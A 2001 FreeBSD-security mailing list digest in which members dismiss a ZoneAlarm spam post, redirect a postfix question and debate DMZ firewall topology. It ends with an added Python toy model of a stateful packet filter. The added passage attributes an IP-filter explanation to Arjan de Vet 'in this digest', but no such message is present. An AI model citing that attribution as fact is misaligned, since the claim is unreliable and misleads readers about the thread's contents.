Received: from contactdish (ASt-Lambert-101-2-1-14.abo.wanadoo.fr [193.251.59.14]) by atkielski.com (8.11.6) id fAOKVR034379; Sat, 24 Nov 2001 21:31:27 +0100 (CET)
Message-ID: <002a01c17526$fe708ac0$0a00000a@atkielski.com>
From: "Anthony Atkielski"
To: "Andrew Kenneth Milton" ,
References: <20011125025239.C12912@zeus.theinternet.com.au>
Subject: Re: Security zone
Date: Sat, 24 Nov 2001 21:31:21 +0100
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4522.1200
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

ZoneAlarm isn't available for FreeBSD, or any other flavor of UNIX. UNIX has much better ways of protecting the system, anyway.

Also, the basic version of ZoneAlarm is free for the download (even though the URL below doesn't mention this), although it looks like ZoneLabs is hoping that European visitors to their site are too clueless to discover this (and they are probably right).
----- Original Message -----
From: "Andrew Kenneth Milton"
To:
Sent: Saturday, November 24, 2001 17:52
Subject: Re: Security zone

> +-------[ sdkghgh ihidhguhg ]----------------------
> | Hi, All!
> |
> | What do you think about this protection?
> |
> | http://zonealarm.co-ltd.com/
> | "ZoneAlarm Pro version 2.6 is the only Internet security solution that
> | automatically blocks
> | known and unknown threats barricading your computer against outside
> | intrusions and attacks.
>
> It's doing this right now for my computer! Wow! That's Amazing! I didn't have
> to do anything, that really is automatic.
>
> --
> Totally Holistic Enterprises Internet|                   | Andrew Milton
> The Internet (Aust) Pty Ltd          |                   |
> ACN: 082 081 472 ABN: 83 082 081 472 | M:+61 416 022 411 | Carpe Daemon
> PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|

From owner-freebsd-security Sat Nov 24 12:49:37 2001
Delivered-To: freebsd-security@freebsd.org
Received: from relay.ip.pt (zibelina2.ip.pt [195.23.132.46]) by hub.freebsd.org (Postfix) with SMTP id 11E4337B418 for ; Sat, 24 Nov 2001 12:45:33 -0800 (PST)
Received: (qmail 20024 invoked by uid 509); 24 Nov 2001 20:45:31 -0000
Received: from unknown (HELO mail.ip.pt) (195.23.132.40) by zibelina2.ip.pt with SMTP; 24 Nov 2001 20:45:31 -0000
Received: (qmail 30848 invoked from network); 24 Nov 2001 20:45:31 -0000
Received: from unknown (HELO enterprise) ([213.205.68.138]) (envelope-sender ) by solha.ip.pt (qmail-ldap-1.03) with SMTP for ; 24 Nov 2001 20:45:31 -0000
Message-ID: <004601c17528$a6ad2030$01000001@enterprise>
Reply-To: José Azevedo
From: José Azevedo
To: "Anthony Atkielski" , "Andrew Kenneth Milton" ,
References: <20011125025239.C12912@zeus.theinternet.com.au>
 <002a01c17526$fe708ac0$0a00000a@atkielski.com>
Subject: Re: Security zone
Date: Sat, 24 Nov 2001 20:43:19 -0000
Organization: Indomabilis
MIME-Version: 1.0
Content-Type: text/plain; charset="Windows-1252"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

Actually, Zone Alarm and any other firewall solutions for Windows suck big time. The packet drop varies a lot, but in some cases it just jams the stack to very slow. And I don't recall fully-auto solutions as a good way for security. Although, it's nice enough to cover a lot of little holes. Don't bet your money on them.

----- Original Message -----
From: "Anthony Atkielski"
To: "Andrew Kenneth Milton" ;
Sent: Saturday, November 24, 2001 8:31 PM
Subject: Re: Security zone

> ZoneAlarm isn't available for FreeBSD, or any other flavor of UNIX. UNIX has
> much better ways of protecting the system, anyway.
>
> Also, the basic version of ZoneAlarm is free for the download (even though the
> URL below doesn't mention this), although it looks like ZoneLabs is hoping that
> European visitors to their site are too clueless to discover this (and they are
> probably right).
>
> ----- Original Message -----
> From: "Andrew Kenneth Milton"
> To:
> Sent: Saturday, November 24, 2001 17:52
> Subject: Re: Security zone
>
>
> > +-------[ sdkghgh ihidhguhg ]----------------------
> > | Hi, All!
> > |
> > | What do you think about this protection?
> > |
> > | http://zonealarm.co-ltd.com/
> > | "ZoneAlarm Pro version 2.6 is the only Internet security solution that
> > | automatically blocks
> > | known and unknown threats barricading your computer against outside
> > | intrusions and attacks.
> >
> > It's doing this right now for my computer! Wow! That's Amazing! I didn't have
> > to do anything, that really is automatic.
> >
> > --
> > Totally Holistic Enterprises Internet|                   | Andrew Milton
> > The Internet (Aust) Pty Ltd          |                   |
> > ACN: 082 081 472 ABN: 83 082 081 472 | M:+61 416 022 411 | Carpe Daemon
> > PO Box 837 Indooroopilly QLD 4068    |akm@theinternet.com.au|

From owner-freebsd-security Sat Nov 24 14:30:36 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 1BABC37B405 for ; Sat, 24 Nov 2001 14:30:34 -0800 (PST)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id PAA29191; Sat, 24 Nov 2001 15:30:09 -0700 (MST)
Message-Id: <4.3.2.7.2.20011124152809.048c57c0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Sat, 24 Nov 2001 15:30:03 -0700
To: "sdkghgh ihidhguhg" , freebsd-security@FreeBSD.ORG
From: Brett Glass
Subject: Re: Security zone
In-Reply-To:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

More spam. Ugh.

By the way, ZoneAlarm (which is available only for Windows) has many bugs. At times, it freezes your IP stack and won't let you click on a button that's supposed to un-freeze it. Its network buffers gradually consume all available memory and the system crashes.
--Brett

At 08:42 AM 11/24/2001, sdkghgh ihidhguhg wrote:
>Hi, All!
>
>What do you think about this protection?
>
>http://zonealarm.co-ltd.com/
>"ZoneAlarm Pro version 2.6 is the only Internet security solution that
>automatically blocks
>known and unknown threats barricading your computer against outside
>intrusions and attacks.
>The award-winning ZoneAlarm Pro provides home users, small-business owners
>and remote employees with
>the highest level of protection. ZoneAlarm Pro-security you can
>trust."
>
>Sincerely, Yours

From owner-freebsd-security Sat Nov 24 15:11:39 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id 2FEB937B405 for ; Sat, 24 Nov 2001 15:11:37 -0800 (PST)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C066C66B27; Sat, 24 Nov 2001 15:11:36 -0800 (PST)
Date: Sat, 24 Nov 2001 15:11:36 -0800
From: Kris Kennaway
To: sdkghgh ihidhguhg
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Security zone
Message-ID: <20011124151136.B28070@xor.obsecurity.org>
References:
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="vGgW1X5XWziG23Ko"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from nateukraine@ukr.net on Sat, Nov 24, 2001 at 05:42:06PM +0200
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, Nov 24, 2001 at 05:42:06PM
+0200, sdkghgh ihidhguhg wrote:
> Hi, All!
>
> What do you think about this protection?
>
> http://zonealarm.co-ltd.com/
> "ZoneAlarm Pro version 2.6 is the only Internet security solution that
> automatically blocks
> known and unknown threats barricading your computer against outside
> intrusions and attacks.
> The award-winning ZoneAlarm Pro provides home users, small-business owners
> and remote employees with
> the highest level of protection. ZoneAlarm Pro-security you can
> trust."

It's basically a lie; you can do all this and more under FreeBSD.

Kris

From owner-freebsd-security Sat Nov 24 15:33:05 2001
Delivered-To: freebsd-security@freebsd.org
Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 621D637B417 for ; Sat, 24 Nov 2001 15:33:02 -0800 (PST)
Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id QAA29584; Sat, 24 Nov 2001 16:32:38 -0700 (MST)
Message-Id: <4.3.2.7.2.20011124162959.04085de0@localhost>
X-Sender: brett@localhost
X-Mailer: QUALCOMM Windows Eudora Version 4.3.2
Date: Sat, 24 Nov 2001 16:32:34 -0700
To: Kris Kennaway
From: Brett Glass
Subject: Re: Security zone
Cc: freebsd-security@FreeBSD.ORG
In-Reply-To: <20011124151136.B28070@xor.obsecurity.org>
References:
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

At 04:11 PM 11/24/2001, Kris Kennaway wrote:
>It's basically a lie; you can do all this and more under FreeBSD.

FreeBSD doesn't have per-application control of ports and sockets, which is what ZoneAlarm *tries* to provide. It'd be nice to add this as a built-in feature, either in the base OS or in ipfw.

--Brett

From owner-freebsd-security Sat Nov 24 17:02:15 2001
Delivered-To: freebsd-security@freebsd.org
Received: from MCSMTP2.MC.VANDERBILT.EDU (mcsmtp2.mc.Vanderbilt.Edu [160.129.50.78]) by hub.freebsd.org (Postfix) with ESMTP id D5C9937B405 for ; Sat, 24 Nov 2001 17:02:12 -0800 (PST)
Subject: postfix problem
To: freebsd-security@freebsd.org
X-Mailer: Lotus Notes Release 5.0.6a January 17, 2001
Message-ID:
From: George.Giles@mcmail.vanderbilt.edu
Date: Sat, 24 Nov 2001 19:00:08 -0600
X-MIMETrack: Serialize by Router on MCSMTP2.MC.vanderbilt.edu/VUMC/Vanderbilt(Release 5.0.6a |January 17, 2001) at 11/24/2001 06:53:29 PM
MIME-Version: 1.0
Content-type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

I just upgraded from 4.3-release to 4.4-release and postfix 20010228 will not start, it complains about the qmgr not running.

Any ideas ?
From owner-freebsd-security Sat Nov 24 17:38:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from web10106.mail.yahoo.com (web10106.mail.yahoo.com [216.136.130.56]) by hub.freebsd.org (Postfix) with SMTP id 6ED7937B417 for ; Sat, 24 Nov 2001 17:38:12 -0800 (PST)
Message-ID: <20011125013812.9839.qmail@web10106.mail.yahoo.com>
Received: from [138.88.33.232] by web10106.mail.yahoo.com via HTTP; Sat, 24 Nov 2001 17:38:12 PST
Date: Sat, 24 Nov 2001 17:38:12 -0800 (PST)
From: G Brehm
Subject: Re: Best security topology for FreeBSD
To: cjclark@alum.mit.edu
Cc: security@FreeBSD.ORG
In-Reply-To: <20011122031739.A226@gohan.cjclark.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

> > It is sad to see this poor design,
>
> Internet
>    |
>    |
> Firewall--"DMZ"
>    |
>    |
> Internal
>
> Used so very, very much these days (I think thanks to several firewall
> vendors pushing this as a standard design).
>
> A much better design, is
>
> Internet
>    |
>    |
> Firewall1
>    |
>    |
> DMZ
>    |
>    |
> Firewall2
>    |
>    |
> Internal
>
> (This design is actually where the term "DMZ" comes from since it
> actually looks like one here.)
>
> And in your case... that many NICs in one machine... I hope you have a
> dedicated stand-by. It's screaming "single point of failure." I would
> really consider NOT using one machine for all of this.
> --
> Crist J. Clark
> cjclark@alum.mit.edu

Sir,

I have only setup a couple firewalls in my day. I have learned much from your posts in the past. I am confused by your bias. You'd think if it was firewall OEM pushing one design it would go for your preferred, (twice the $).
I don't even want to think about a 10 NIC system, but talking 3 or 4 what is so bad with the first choice?

=====
- i believe in dogs

From owner-freebsd-security Sat Nov 24 18:07:00 2001
Delivered-To: freebsd-security@freebsd.org
Received: from obsecurity.dyndns.org (adsl-64-165-226-105.dsl.lsan03.pacbell.net [64.165.226.105]) by hub.freebsd.org (Postfix) with ESMTP id AF29E37B416 for ; Sat, 24 Nov 2001 18:06:57 -0800 (PST)
Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 30D1766B27; Sat, 24 Nov 2001 18:06:57 -0800 (PST)
Date: Sat, 24 Nov 2001 18:06:56 -0800
From: Kris Kennaway
To: George.Giles@mcmail.vanderbilt.edu
Cc: freebsd-security@freebsd.org
Subject: Re: postfix problem
Message-ID: <20011124180656.A83390@xor.obsecurity.org>
References:
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="+HP7ph2BbKc20aGI"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: ; from George.Giles@mcmail.vanderbilt.edu on Sat, Nov 24, 2001 at 07:00:08PM -0600
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On Sat, Nov 24, 2001 at 07:00:08PM -0600, George.Giles@mcmail.vanderbilt.edu wrote:
> I just upgraded from 4.3-release to 4.4-release and postfix 20010228 will
> not start, it complains about the qmgr not running.
>
> Any ideas ?

This is not a security-related question.
Please do not abuse the mailing lists, and ask your general support questions on questions@freebsd.org. Thanks.

Kris

From owner-freebsd-security Sat Nov 24 18:25:06 2001
Delivered-To: freebsd-security@freebsd.org
Received: from home.24cl.com (121.113.sn.ct.dsl.thebiz.net [216.238.113.121]) by hub.freebsd.org (Postfix) with ESMTP id 8586937B405 for ; Sat, 24 Nov 2001 18:24:59 -0800 (PST)
Received: from bloat (unknown [192.168.0.33]) by home.24cl.com (Postfix) with ESMTP id CD4B281E22; Sat, 24 Nov 2001 21:24:56 -0500 (EST)
Message-ID: <200111242124560932.023F3386@home.24cl.com>
In-Reply-To: <20011125013812.9839.qmail@web10106.mail.yahoo.com>
References: <20011125013812.9839.qmail@web10106.mail.yahoo.com>
X-Mailer: Calypso Version 3.20.01.01 (4)
Date: Sat, 24 Nov 2001 21:24:56 -0500
Reply-To: myraq@mgm51.com
From: "MikeM"
To: "G Brehm" , cjclark@alum.mit.edu
Cc: security@FreeBSD.ORG
Subject: Re: Best security topology for FreeBSD
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
List-ID:
List-Archive: (Web Archive)
List-Help: (List Instructions)
List-Subscribe:
List-Unsubscribe:
X-Loop: FreeBSD.org

On 11/24/2001 at 5:38 PM G Brehm wrote:

|>
|> It is sad to see this poor design,
|>
|> Internet
|>    |
|>    |
|> Firewall--"DMZ"
|>    |
|>    |
|> Internal
|>
|> Used so very, very much these days (I think thanks
|> to several firewall
|> vendors pushing this as a standard design).
|>
|> A much better design, is
|>
|> Internet
|>    |
|>    |
|> Firewall1
|>    |
|>    |
|> DMZ
|>    |
|>    |
|> Firewall2
|>    |
|>    |
|> Internal
|>
|> (This design is actually where the term "DMZ" comes
|> from since it
|> actually looks like one here.)

=============

I'm not sure I agree with your comments. Yes, your architecture is more akin to the origin of the term "DMZ", but is that the real functionality that we want to provide? Should we be more concerned with staying within the strict definition of the military term "DMZ" or should our firewalls provide the needed function?

In my "DMZ", the server only sees port 80 traffic. *only port 80* I cannot possibly provide that functionality with your strict interpretation of a DMZ firewall. Given the options of tossing aside your strict definition of DMZ or re-architecting my firewall, I think I'd vote for tossing aside your definition.
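Two passages in this digest describe the same mechanism from different angles: Arjan de Vet's explanation that IP-filter consults its state table (a hash lookup) before the rule list, with the rules deciding only whether a new connection may be opened, and MikeM's policy that the DMZ web server sees port 80 traffic and nothing else. The toy model below is an added example, not code from the thread and not IP Filter's own code. It assumes a first-match-wins rule walk (a simplification), that only a TCP SYN may create a state entry, and it leaves out the sequence-number and window checks from van Rooij's paper; the addresses (RFC 5737 documentation ranges and a 10.0.0.0/8 internal host), the DMZ_WEB host and the rule set are constructed for the example.

```python
"""Toy model of a state-table-first packet filter, after Arjan de Vet's
description of IP-filter in this digest.

Added example; not code from the thread and not IP Filter's own code.
It models one thing: an arriving packet is looked up in a state (hash)
table first and, on a hit, passed without consulting the rules; on a miss
the rule list decides whether a *new* connection is allowed, and an
accepted one is entered into the state table. The rule set encodes MikeM's
"the DMZ server only sees port 80" policy. Assumptions: first matching rule
wins (a simplification), only a TCP SYN can create state, and no TCP
sequence/window checking. Addresses are constructed for the example.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

DMZ_WEB = "203.0.113.10"    # constructed: the DMZ web server
INTERNAL_NET = "10.0.0."    # constructed: internal prefix (string-prefix match)

StateKey = Tuple[str, str, int, str, int]


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str = "tcp"
    syn: bool = False      # True only for a connection-opening segment


@dataclass(frozen=True)
class Rule:
    action: str                       # "pass" or "block"
    src_prefix: Optional[str] = None  # None means any source
    dst: Optional[str] = None         # None means any destination
    dport: Optional[int] = None       # None means any port
    keep_state: bool = False

    def matches(self, pkt: Packet) -> bool:
        return ((self.src_prefix is None or pkt.src.startswith(self.src_prefix))
                and (self.dst is None or pkt.dst == self.dst)
                and (self.dport is None or pkt.dport == self.dport))


@dataclass
class StatefulFilter:
    rules: List[Rule]
    state: Dict[StateKey, str] = field(default_factory=dict)  # dict = hash table
    rule_walks: int = 0   # how many packets reached the rule list at all

    @staticmethod
    def _key(p: Packet) -> StateKey:
        return (p.proto, p.src, p.sport, p.dst, p.dport)

    @staticmethod
    def _reverse(p: Packet) -> StateKey:
        return (p.proto, p.dst, p.dport, p.src, p.sport)

    def filter(self, pkt: Packet) -> str:
        # Step 1: state table lookup, in either direction of an accepted flow.
        if self._key(pkt) in self.state or self._reverse(pkt) in self.state:
            return "pass (state)"
        # Step 2: no state. Only a SYN may open a new TCP connection, so a
        # stray ACK/RST with no state never reaches the rules (assumption).
        if pkt.proto == "tcp" and not pkt.syn:
            return "block (no state)"
        # Step 3: the rule walk decides whether the new connection is allowed.
        self.rule_walks += 1
        for rule in self.rules:
            if rule.matches(pkt):
                if rule.action == "pass" and rule.keep_state:
                    self.state[self._key(pkt)] = "established"
                return f"{rule.action} (rule)"
        return "block (default)"


# MikeM's policy: the DMZ host is reachable on port 80 only; internal hosts
# may open outbound connections; everything else is blocked by default.
DMZ_RULES = [
    Rule("pass", dst=DMZ_WEB, dport=80, keep_state=True),
    Rule("pass", src_prefix=INTERNAL_NET, keep_state=True),
]


def run_scenario(fw: Optional[StatefulFilter] = None) -> Tuple[List[str], StatefulFilter]:
    """Push a constructed packet sequence through the filter; return verdicts."""
    fw = fw or StatefulFilter(DMZ_RULES)
    client, internal = "198.51.100.7", "10.0.0.5"
    packets = [
        Packet(client, 40000, DMZ_WEB, 80, syn=True),     # new HTTP connection
        Packet(DMZ_WEB, 80, client, 40000),                # its reply: state hit
        Packet(client, 40001, DMZ_WEB, 22, syn=True),      # SSH from outside
        Packet(client, 40002, DMZ_WEB, 80),                # ACK with no state
        Packet(internal, 5000, client, 443, syn=True),     # internal outbound
        Packet(client, 443, internal, 5000),               # its reply: state hit
    ]
    return [fw.filter(p) for p in packets], fw


if __name__ == "__main__":
    verdicts, fw = run_scenario()
    for v in verdicts:
        print(v)
    print(f"state entries: {len(fw.state)}, rule walks: {fw.rule_walks}")
```

The rule_walks counter is the point of the model: of six packets, only the three connection openers ever touch the rule list; the two replies are passed by the state table alone, and the stateless ACK is dropped before the rules are consulted. That is also why the DMZ host ends up seeing nothing but port 80 from outside, regardless of whether the topology is drawn with one firewall or two.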